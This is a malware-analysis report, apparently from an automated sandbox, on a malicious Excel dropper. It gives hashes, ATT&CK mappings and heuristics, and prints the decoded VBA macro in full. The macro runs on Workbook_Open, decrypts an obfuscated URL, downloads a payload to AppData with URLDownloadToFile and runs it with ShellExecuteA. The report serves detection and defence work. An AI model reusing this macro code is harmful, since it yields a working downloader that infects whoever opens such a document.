Xls.Dropper.Agent-9337433-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 e2a46938cd94619e…

MALICIOUS

Office (OLE)

140.5 KB Created: 2020-08-13 13:37:22 Authoring application: Microsoft Excel First seen: 2020-09-15
MD5: e3de312a23a0f519ffd71e95e1949c73 SHA-1: 645252cd3d2d392d793dc17e8196099358c248e9 SHA-256: e2a46938cd94619e9ce8f276c84559b061c631382ef169041b3559ef68c5e6f5
276 Risk Score

Malware Insights

Xls.Dropper.Agent-9337433-0 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample is an Excel document containing VBA macros that are automatically executed upon opening due to the Workbook_Open event. The macro uses URLDownloadToFile to download a payload from the decrypted URL 'fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui' and saves it to the AppData directory as 'Xls.Dropper.Agent-9337433-0'. Subsequently, ShellExecuteA is called to execute the downloaded file, indicating a dropper functionality.

Heuristics 8

  • ClamAV: Xls.Dropper.Agent-9337433-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-9337433-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare Function DDBGe Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
    ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6798 bytes
SHA-256: 26c97b14415416399a8312a7194dc8a22a6b777d5a0afd7d53779bde5e1542a1
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Sib()

End Sub

Attribute VB_Name = "SiloKkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function BIYzzPFHzYBg Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal zYBgeLAULCPbJIwwXgsUoT As Long, ByVal sJVJHBTQnWiokvMNjkuR As String, _
ByVal ycrXexFvbVWUZKE As String, ByVal LpQBRVXPpRwhdQm As String, ByVal cShrZZMzZwJXEVIMmZXRkh As String, ByVal DZyEALOezAKT As Long) As Long

Private Declare Function DDBGe Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal lsWjjyCFxVleNvySvzNKt As Long, ByVal GggHPcEXDbtStEyQAWGRW As String, _
ByVal TfwKSTdBvYbHN As String, ByVal hpfKFGEJuBIY As Long, ByVal zzPFH As Long) As Long

Sub MLoVnY()
Dim BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As String
Dim eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As String
Dim CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP As String
Dim cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui As String
Dim QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc As String
Dim DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD As String

eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM = Decrypt("fyf/xxdd")

CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP = Environ$("AppData") & "\" & eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM


BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn = Decrypt("fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui")

DDBGe 0, BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn, CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, 0, 0
BIYzzPFHzYBg 0, "open", CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP, "", vbNullString, vbNormalFocus
End Sub

Sub Workbook_Open()

MLoVnY
End Sub


Function Decrypt(enc)
    Dim x, m_
    Dim AppData, daor As Variant
    enc = StrReverse(enc)
    For m = 1 To Len(enc)
        x = Mid(enc, m, 1)
        AppData = AppData & Chr(Asc(x) - 1)
    Next
    Decrypt = AppData
    For d = 1 To Len(doar)
    doar = ""
    Next
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_dvbsbmbi
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 950 bytes
' Line #0:
' 	FuncDefn (Sub sJVJHBTQnWiokvMNjkuR())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/SiloKkbook - 4446 bytes
' Line #0:
' 	LineCont 0x0008 07 00 00 00 13 00 00 00
' 	FuncDefn (Private Declare Function LpQBRVXPpRwhdQm Lib "TfwKSTdBvYbHN" (ByVal cShrZZMzZwJXEVIMmZXRkh As Long, ByVal DZyEALOezAKT As String, ByVal shell32.dll As String, ByVal DDBGe As String, ByVal lsWjjyCFxVleNvySvzNKt As String, ByVal GggHPcEXDbtStEyQAWGRW As Long) As Long)
' Line #1:
' Line #2:
' 	LineCont 0x0008 07 00 00 00 13 00 00 00
' 	FuncDefn (Private Declare Function hpfKFGEJuBIY Lib "CnmYhjuikolpMNBVCXzaqswdefrVtbyhyujmhgffvbJolP" (ByVal zzPFH As Long, ByVal urlmon As String, ByVal MLoVnY As String, ByVal BcthYUjKmIOlPVCDrfvgTRewSQaZxSdfFRtyuIkiopmn As Long, ByVal eMjuikLOpnBVcxZASDewqsdfgthyUjKMLOploiujHBnHYTgfrfvcDEsxdfgbHNM As Long) As Long)
' Line #3:
' Line #4:
' 	FuncDefn (Sub cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui())
' Line #5:
' 	Dim 
' 	VarDefn QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc (As String)
' Line #6:
' 	Dim 
' 	VarDefn DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD (As String)
' Line #7:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #8:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #9:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #10:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #11:
' Line #12:
' 	LitStr 0x0008 "fyf/xxdd"
' 	ArgsLd Workbook_Open 0x0001 
' 	St DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD 
' Line #13:
' Line #14:
' 	LitStr 0x0007 "AppData"
' 	ArgsLd enc$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld DbghyhujikolpokmNHghDDeWqaZXSXCDvetyrtghjuikdfvrtyJD 
' 	Concat 
' 	St Decrypt 
' Line #15:
' Line #16:
' Line #17:
' 	LitStr 0x0034 "fyf/`efohjT`ltcwvzR0psf{0mq/{jc/eqvujyjnfmjo00;tquui"
' 	ArgsLd Workbook_Open 0x0001 
' 	St QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc 
' Line #18:
' Line #19:
' 	LitDI2 0x0000 
' 	Ld QyhndwsxeOlpokmnjHyhgtRfcvdefThyujOlpKMJuhyVbNc 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall hpfKFGEJuBIY 0x0005 
' Line #20:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld x 
' 	Ld m_ 
' 	ArgsCall LpQBRVXPpRwhdQm 0x0006 
' Line #21:
' 	EndSub 
' Line #22:
' Line #23:
' 	FuncDefn (Sub AppData())
' Line #24:
' Line #25:
' 	ArgsCall cFgTbNhjukioplmnbvcxzASDFghJUYHGtRfehrOlPlmJNHgthyui 0x0000 
' Line #26:
' 	EndSub 
' Line #27:
' Line #28:
' Line #29:
' 	FuncDefn (Function Workbook_Open(daor, id_FFFE As Variant))
' Line #30:
' 	Dim 
' 	VarDefn StrReverse
' 	VarDefn m
' Line #31:
' 	Dim 
' 	VarDefn Chr
' 	VarDefn Asc (As Variant)
' Line #32:
' 	Ld daor 
' 	ArgsLd d 0x0001 
' 	St daor 
' Line #33:
' 	StartForVariable 
' 	Ld doar 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld daor 
' 	FnLen 
' 	For 
' Line #34:
' 	Ld daor 
' 	Ld doar 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St StrReverse 
' Line #35:
' 	Ld Chr 
' 	Ld StrReverse 
' 	ArgsLd Sheet2 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd Sheet1 0x0001 
' 	Concat 
' 	St Chr 
' Line #36:
' 	StartForVariable 
' 	Next 
' Line #37:
' 	Ld Chr 
' 	St Workbook_Open 
' Line #38:
' 	StartForVariable 
' 	Ld Sheet3 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld Workbook 
' 	FnLen 
' 	For 
' Line #39:
' 	LitStr 0x0000 ""
' 	St Workbook 
' Line #40:
' 	StartForVariable 
' 	Next 
' Line #41:
' 	EndFunc 
' Line #42:
' _VBA_PROJECT_CUR/VBA/Sheet1 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 977 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 977 bytes